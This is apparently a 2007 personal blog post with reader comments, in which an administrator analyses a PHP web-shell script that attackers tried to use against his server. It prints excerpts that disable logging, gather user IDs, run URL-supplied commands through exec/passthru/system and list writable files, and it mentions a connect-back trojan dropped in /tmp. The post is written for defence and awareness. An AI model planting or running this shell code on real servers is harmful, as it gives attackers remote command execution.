PHP Exploits » Blog Archive

Yesterday a compromised server was used to attempt to get into my box. Thankfully I have an operationally mod_security and a damn fine firewall, that monitors mod_security alerts. This is a vital thing to have, especially if you have any compromisable software running. I do daily and weekly checks of my server to make sure there aren’t any things on here that shouldn’t be.

There was a link referenced in the mod_security alerts that I took a look at, just out of curiosity. I was amazed at how simple the PHP code was, but how leathal it would have been to a compromised system. Here’s a run down of what I found, including some of the code.

The first thing that’s present in the requested file is the following code.

<?php
closelog( );
 
$dono = get_current_user( );
$ver = phpversion( );
$login = posix_getuid( );
$euid = posix_geteuid( );
$gid = posix_getgid( );
if ($chdir == "") $chdir = getcwd( );
 
?>

The first PHP line closes off any logging by PHP to the system logging. This is bad because it means anything from this point on won’t be logged and we’ll have a harder time looking into the exploit if the server was compromised.
The next few lines get various pieces of information about the system, which will help the attacked into ascertaining how best to get into your system.

<?php
if ($fe == 1) {
$fe = "exec";
}
if ($fe == ""){
$fe = "passthru";
}
if ($fe == "2"){
$fe = "system";
}
 
if (isset($chdir)) @chdir($chdir);
 
ob_start( );
$fe("$cmd  2>&1");
$output = ob_get_contents();
ob_end_clean( );
?>

This next chunk of code attempts to run certain commands passed to the URL in the script.
The commands that I saw via mod_security varied, but were mainly methods used to try and download more scripts to assist with the exploit.

The next part of the script then scans the file system to see what files and folders are writable. Here’s an excerpt.

echo "<b><font size=2 face=arial>List Writable Files</b> <br><br>";
 
      if ($dir = opendir($chdir)) {
        while (($file = readdir($dir)) !== false) {
          if (@is_writable($file) && @is_file($file)) {
            $file1 = fileowner($file);
            $file2 = fileperms($file);
            echo "<font color=red>$file1 - $file2 - $file </font><br>";
          }
        }
      }

The next part of the script attempts to then write a trojan to the /tmp directory called PHP/Chaploit or dc-connectback.c in my case. A nasty piece of work that essentially gives a backdoor into the server.

If the script manages to get this far, your server is most likely compromised and you’re going to be spending a long time cleaning up the mess that gets made.
This just highlights how important it is to keep software up to date, keep on top of new mod_security rules and run a good firewall!

4 Responses to “PHP Exploits”

Security is important - Defender Hosting Forums April 12th, 2007 at 11:04 pm

[...] to exploit certain vulnerabilities in PHP and other memory management tools. If anyones interested, here’s my feeble attempt at an analysis. I still have the link to the entire script if anyone wants to take a look for themselves. For [...]
phil April 13th, 2007 at 9:31 am

Shucks. Thwarted again by you meddling kids! *shakes fist*

Nah seriously, was this your home PC or the SDJL server?
chief April 14th, 2007 at 1:15 am

Thanks for the code - good to know.
David April 15th, 2007 at 9:54 pm

Phil: This was on the “SDJL Server”! No one got in, but I was intrigued by the script they tried to use to get in.

chief: No worries. Alwaysy useful to know!

Recent Comments

Recent Posts